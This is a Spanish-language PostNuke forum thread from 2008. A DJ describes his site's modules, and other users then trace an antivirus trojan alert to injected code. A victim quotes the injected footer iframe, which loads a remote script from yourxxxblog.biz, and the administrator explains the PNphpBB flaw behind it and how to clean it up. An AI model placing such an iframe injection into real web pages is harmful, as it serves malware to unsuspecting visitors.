Frecuente
Mensajes: 47
Enviado:
31.ene 2008 - 20:35
Hace algun tiempo un amigo me enseño algo de php nuke y me gusto monte alguna web en servidores gratuitos etc y aprendi alguna cosa y despues de mas de 10 años como Dj decidi hace no mas de 6 meses crear una web para mostrar mi trabajo al mundo.
Como todo buen humano despues de leer en muchos foros me aconsejaban que si tenia intencion de hacer una web en serio contratara un servicio de hosting yo monte mi web en un servidor gratuito con un subdominio y limites por todas partes (la verdad no creo que haya ninguno decente.
Claro esta que a los dos meses de esto me di cuenta de que no hacia nada de esta manera ya que el servicio no era bueno no tenia espacio web y tiraba de mediafire etc etc
Bueno ya decidido a comprar espacio web contrate un hosting de 20 gb sin ningun limite en un servidor de USA q es mucho mas barato y funciona igual.
Rapidamente me decidi por Postnuke y tambien rapidamente me di cuenta de que esta web iva ser mi fuente de conocimientos de este sistema.
Para instalar postnuke todo perfecto me funciono a la primera ya tenia algo de experiencia con phpnuke y con el manual de esta web todo fue ok
Estos son los mudulos que estan instalados en mi web (aunq algunos no estan activos todavia)
MODULOS
AddStory Enviar_Noticias -Ya estaba instalado en la version que utilizo
Admin Administracion - Ya estaba instalado en la version que utilizo
Admin_Messages Admin_Messages 1.5 -Ya estaba instalado en la version que utilizo
advanced_polls Advanced Polls - Encuestas,instalacion sin problemas,Modulo que utilizare cuando agamos un concurso de Dj's para que la gente vote las sesiones
Autolinks-Ya estaba instalado en la version que utilizo
AvantGo -Ya estaba instalado en la version que utilizo
Banners - Ya estaba instalado en la version que utilizo
Blocks Bloques Administration- Ya estaba instalado en la version que utilizo
Censor Censor -Ya estaba instalado en la version que utilizo
Comments Comentarios- Ya estaba instalado en la version que utilizo
Credits Creditos- Ya estaba instalado en la version que utilizo
dpDocs dpDocs Módulo -Instalacion sin problemas perfecto para poder mostrar contenido no establecido para otros modulos
dpGallery dpGallery -Esta es la unica galeria qque consegui instalar con exito en mi web y aun asi algun problema ya tengo
dpPartner dpPartner Perfecto sistema para gestionar afiliados instalacion todo ok administracion muy sencilla
dp_Contact dp_Contact Modulo de contacto con el administrador de la web instalado perfectamente
Ephemerids Ephemerids- Ya estaba instalado en la version que utilizo
FAQ- Ya estaba instalado en la version que utilizo
Groups -Ya estaba instalado en la version que utilizo
Header_Footer -Ya estaba instalado en la version que utilizo
images -Ya estaba instalado en la version que utilizo
legal Avisos_-Ya estaba instalado en la version que utilizo
LostPassword Claves_olvidadas -Ya estaba instalado en la version que utilizo
Mailer Correo -Ya estaba instalado en la version que utilizo
MailUsers Correo_Usuarios-Ya estaba instalado en la version que utilizo
mediashare -Gestionar mp3 para los usuarios en la web tuve problemas con el y lo deje de lado pendiente para borrar no se mostraba la administracion y tenia los 777 que pide
Members_List - Ya estaba instalado en la version que utilizo
Messages Messages - Ya estaba instalado en la version que utilizo
Modules Modulos Enable/disable - Ya estaba instalado en la version que utilizo
Multisites -Ya estaba instalado en la version que utilizo
News Noticias -Ya estaba instalado en la version que utilizo
NewUser Nuevo_Usuario - Ya estaba instalado en la version que utilizo
Permissions Permisos - Ya estaba instalado en la version que utilizo
PNphpBB2 PNphpBB2 -Sabiendo que no se va usar demasido lo instale y esta activo todo ok el problema es que no consigo cambiar el aspecto del foro y queda un poco cutre con el que viene ya que no pega nada con el theme de la web
pnRaOnLi pnRaOnLi Radio On line para PostNuke-Radio piraña es la que elegi para mi web pero puedes poner la que quieras muy sencillo de utilizar funciona todo ok
pnRender - Ya estaba instalado en la version que utilizo
pn_bbcode pn_bbcode -Ya estaba instalado en la version que utilizo
pn_bbsmile -Ya estaba instalado en la version que utilizo
Polls - Ya estaba instalado en la version que utilizo
Quotes Random -Ya estaba instalado en la version que utilizo
Ratings Ratings -Ya estaba instalado en la version que utilizo
Recommend_Us - Ya estaba instalado en la version que utilizo
Referers Referencias-Ya estaba instalado en la version que utilizo
Reviews Analisis -Ya estaba instalado en la version que utilizo
RSS RSS RSS - Ya estaba instalado en la version que utilizo
Search Buscar -Ya estaba instalado en la version que utilizo
Sections Secciones -Ya estaba instalado en la version que utilizo
Settings Configuracion -Ya estaba instalado en la version que utilizo
Sniffer Sniffer-Ya estaba instalado en la version que utilizo
Stats Estadisticas - Ya estaba instalado en la version que utilizo
Submit_News -Ya estaba instalado en la version que utilizo
TagIt TagIt El mejor shoutbox para PostNuke! -Muy buen mensajero facil de usar y que en mi caso no utiliza nadie en la web
Top_List Top_List -Ya estaba instalado en la version que utilizo
typetool -Ya estaba instalado en la version que utilizo
UpDownload -Unico modulo de descargas que funciono ok en mi web sin hacer demasiados intentos este esta bastante bien para mi el mayor problema es la cantidad de paginas que hay que cargar asta llegar al link en algunos ya que la gente se "raya" con ese tema
User Usuarios -Ya estaba instalado en la version que utilizo
Web_Links - Ya estaba instalado en la version que utilizo
Wiki Wiki -Ya estaba instalado en la version que utilizo
Xanthia - Ya estaba instalado en la version que utilizo
Your_Account -Ya estaba instalado en la version que utilizo
La verdad es que hay muchos de los modulos que ya estaban instalados no se para que son menos lo que es evidente cual es su funcion pero llevo solo un mes trabajando este sistema.
Bueno vamos con la parte mas importante de la web los bloques que sin ellos no puedes mostrar contenido suficiente en portada y creo que es importante para dar un buen aspecto a la web
BLOQUES
Videos Base html- Bloque html con videos de youtube aleatorios cada vez que carga la pagina sale uno distinto (Se muestra atrabes del bloque Tabblok
Fotos Base dpGallery_Block- Problemas al mostrar las imagenes intentando resolverlo
Dj's Base html -Html que muestra una lista de dj's con foto y sesion
Inicio Base tabblock- En este modulo se muestran otros modulos a los que se accede atrabes de pestañas es perfecto y no me da problemas se puede mostrar mucho contenido en poco espacio
Centro Top Descargas -El unico modulo que hay para el centro de updownload tuve que buscar en otras webs por que esta en esta no me funcionaba lo baje de una web guiri y hice la traducion al español
Mensaje del Admin- Bloque ya instalado en la version que utilizo
Menú principal -Bloque ya instalado en la version que utilizo
Sesiones online-bloque html que muestra reproductores en flash
Radio Online pnRaOnLi -Bloque del modulo ya citado incluido en el mismo y muy completo
Estadisticas-Estadisticas para el modulo updonload descargado de otra web y traducido al español
En Espera Base menu- Bloque ya instalado en la version que utilizo
Base online Bloque ya instalado en la version que utilizo
Bloque del usuario - Bloque ya instalado en la version que utilizo
Buscar- Bloque ya instalado en la version que utilizo
Hablar Con 137 Base html-Mensajeria directa tus usuarios por cortesia de Plugoo
Mensajero TagIt- Bloque del modulo ya citado
Afiliados dpPartner dpPartner-Muestra los minibanners que tengo agregados en el modulo de administracion de afiliados que ya hemos comentado
dp-Visitas- Bloque que no tengo muy claro si cuenta visitas o impresiones por que yo actualizo pero me queda esa duda
Tu Cuenta Base login-Bloque ya instalado en la version que utilizo
Ese es todo lo que utilizado en mi web.
Experiencias
Todas positivas es un sistema estupendo con el cual una persona con un poco de ganas y algun quebradero de cabeza puede hacer su propia pagina web y tambien administrarla sin necesidad de saber demasiado.
Pros-Es gratis-Rapido de montar,Sencillo de utilizar,mucho contenido y mucha informacion en la red,el mayor de todos los pros es esta web sin la cual por lo menos yo no habria conseguido ni la mitad
Contras-Si no sabes un poco mas de codigo todas las web se parecen mucho, y despues de 30 min no se me ocurre ninguno mas
Esto es un poco lo que he vivido yo desde que empece a utilizar este sistema la verdad es que me gustaria saber mas sobre como modificar los themes para darle un toque mas personalizado o como mostrar contenido fuera de bloques y modulos cosa que espero aprender poco a poco para dar a mi web un aire mas personal
WWW.DJ137.ORG
Esta es la web que estoy contruyendo la haceptacion del publico esta siendo buena la media de visitas es muy buena teniendo en cuenta que solo lleva este mes en marcha y no la puse en google y todo ese royo di mi nueva url a mis afiliados etc etc etc
Otra cosa que tambien exo es redireccionar el trafico de mi web gratuita a esta nueva
Bueno eso es todo si espero que os guste la web a todos y tambien el contenido q el fin de todo esto es que los usuarios descargen mis sesiones y opinen sobre mi trabajo cosa que todavia no he conseguido que agan pero bueno se que es dificil todo esto y me lo tomo con calma
Pd-La alineacion a la izquierda de las noticias y el bloque central de descargas os gusta asi ???
O estaria menjor centrado ¿
Muchas gracias a todos y sobretodo a la gente de esta web que tanto empeño pone en contestar nuestras dudas
WWW.DJ137.ORG
Conectado
Administrador
Mensajes: 1417
Enviado:
1.feb 2008 - 00:19
Jejejeje
para la 0.8 vamos a tener todo un repertorio de themes
y fáciles de modificar! no te preocupes!
en ello estoy trabajando y poniendo mi granito de arena
Lo llamo sentimiento comunitario
y se siente muy bien ayudar cuando se puede!
Felicidades por el estupendo trabajo!
ya quiero ver como te va a quedar con la 0.8!
Mateo Tibaquira
-Mis principios... son mis fines-
-Mis principios... son mis fines-
Posteador de Bronce
Mensajes: 371
Enviado:
1.feb 2008 - 10:20
Supongo que sera una falsa alarma.
Saludos.
Novato
Mensajes: 24
Enviado:
1.feb 2008 - 21:53
Colaborador
Mensajes: 1121
Enviado:
1.feb 2008 - 22:17
saludos
Frecuente
Mensajes: 47
Enviado:
1.feb 2008 - 23:14
De donde puede venir a mi el antuvirus no me dice nada
Gracias a todos por los comentarios
Haber si es verdad eso del troyano xddd como puedo solucionarlo ¿
Posteador de Bronce
Mensajes: 371
Enviado:
2.feb 2008 - 01:33
Pues con una cosa asi, ni bromeo ni me la invento, mira esta imagen:
Saludos.
Conectado
Administrador
Mensajes: 1417
Enviado:
2.feb 2008 - 02:54
Si ves el código fuente aparece:
lo que está ejecutando es:
Ahi está el código malicioso...
Pusiste algo al final? un plugin?
quitalo y borra las plantillas compiladas de Xanthia!
Mateo Tibaquira
-Mis principios... son mis fines-
-Mis principios... son mis fines-
Frecuente
Mensajes: 47
Enviado:
2.feb 2008 - 14:51
Hay un texto con un elace a una web y una imagen de la licencia creative commons solo eso
Es el codigo malicioso por que por lo demas yo no puse nada raro !
Gracias a todos por la ayuda
llobarret :No sugeria que fuera un ivencion la expresion haber si va ser verdad era por que ya son dos los que lo decian no sugiriendo que mentiria nadie xddd
Un saludo a todos !
Conectado
Administrador
Mensajes: 1417
Enviado:
2.feb 2008 - 20:19
He solicitado acceso FTP a 'mintrak', lo ha concedido y he visto que en el index.php había una adición maliciosa al final del archivo.
Este es un llamado de atención a la comunidad.
hay que tener mucho cuidado con lo que le añadimos a la Web.
Mucho cuidado cuando se requira reemplazar archivos del núcleo como el index.php, modules.php,
cualquier archivo de la carpeta /includes ... Nada!
No podemos ceder a esos cambios a no ser que sean reconocidos por la comunidad en algun hack
(pero ahora los hacks no son bien vistos,
y van a ser contados con los dedos de una mano en caso de haber alguno).
Asi que mucho cuidado!
Mateo Tibaquira
-Mis principios... son mis fines-
-Mis principios... son mis fines-
Posteador de Bronce
Mensajes: 371
Enviado:
3.feb 2008 - 01:21
Tranquilo hombre, no me molesto el comentario.
Estamos para ayudarnos, a mi tambien me gustaria, que si alguien ve algo fuera de lo normal o raro en mi Web me avisara.
Saludos y la web te esta quedando muy bien.
Posteador de Bronce
Mensajes: 371
Enviado:
3.feb 2008 - 01:23
Frecuente
Mensajes: 47
Enviado:
3.feb 2008 - 01:58
Un saludo Novato
Mensajes: 8
Enviado:
18.abr 2008 - 18:31
He seguido todos los comentarios de este tema, y creo tener la desgracia de que mi actual página hecha con la versión 0764 tiene el mismo problema que ha tenido mintrak.
En cuanto se carga la página www.cngranada.es mi antivirus de Symantec, detecta un troyano llamado dowloader.
Esto me resulta a mí y a los pocos seguidores que tengo, una incomodidad.
El caso es con no tengo ni idea de cómo a podido llegar ni como corregirlo.
De hecho he tenido que cerrar para no pasar vergüenzas.
Actualmente la tengo abierta por si puedo solucionarlo, sin perder todo lo que tengo.
Si alguien tiene alguna solución ruego me eche un cable para poder seguir trabajando.
Si sirve de algo he cambiado el index.php, por una copia de seguridad, pero esto sigue igual.
Un saludo para todos
Conectado
Administrador
Mensajes: 1417
Enviado:
18.abr 2008 - 23:47
y hay que estar actualizado a la última versión (somo siempre)
para remover la intrusión
hay que limpiar el mensaje del footer desde el panel de configuración,
pues allí es donde insertan un IFRAME.
Suerte!
Mateo Tibaquira
-Mis principios... son mis fines-
-Mis principios... son mis fines-
Novato
Mensajes: 8
Enviado:
19.abr 2008 - 12:04
Lamento tener que usar un apartado del foro que no corresponde con este tema.
Pero creo que mis conocimientos sobre el tema están muy limitados.
No sé que opción del panel de configuración de (PNphpBB2vv o CPANEL) puede limpiar este mensaje del footer.
¿Esta intrusión esta en el código o en la base de datos, pues borre todos los ficheros de Public_html y lo sustituí por una copia que tenía antes de que se infectara, y este troyano sigue saliendo?
Conectado
Administrador
Mensajes: 1417
Enviado:
19.abr 2008 - 17:17
El panel de configuración de PostNuke 0.764 (admin.php?module=Settings) te da la opción de poner el mensaje de Footer (donde por defecto dice "sitio soportado por PostNuke, PHP y adoDB, etc...), y sí, está en la base de datos en la tabla pn_module_vars con el nombre footermsg (o algo parecido).
La vulnerabilidad de PNphpBB permite que modifiquen la base de datos de PostNuke...
Suerte!
Mateo Tibaquira
-Mis principios... son mis fines-
-Mis principios... son mis fines-
Novato
Mensajes: 8
Enviado:
19.abr 2008 - 22:59
En el module=Settings y en el apartado:
Mensaje a pie de página
Me he encontrado lo siguiente.
No tengo ni idea de cómo ha llegado hasta ahí, pero estoy seguro de que yo no lo he puesto, el caso es que lo he eliminado y no vuelve a saltar el antivirus, de momento.
En cuanto pueda revisare la base de datos por donde dices a ver si encuentro algo y actualizare el PNphpBB para que no vuelva a ocurrir.
Gracias, en breve espero terminar y solucionarlo por completo.
Novato
Mensajes: 8
Enviado:
19.abr 2008 - 23:14
Veo que no ha salido la linea de codigo, ha desaparecido en el anterior mensaje.
Ruego lo borres por si puede dar problemas.
El codigo es ( espero salga )
i f r a m e s r c = "http://www.yourxxxblog.biz/js_go_f1.php" ></i f r a m e
Novato
Mensajes: 8
Enviado:
20.abr 2008 - 20:45
Que pena usar esos conocimientos para Jod..... cuando uno queda mas satisfecho ayudando.
No tengo ni idea de cómo pueden entrar o por donde, mi Gozo en un Pozo.
En fin, a ver que solución tengo.
Gracias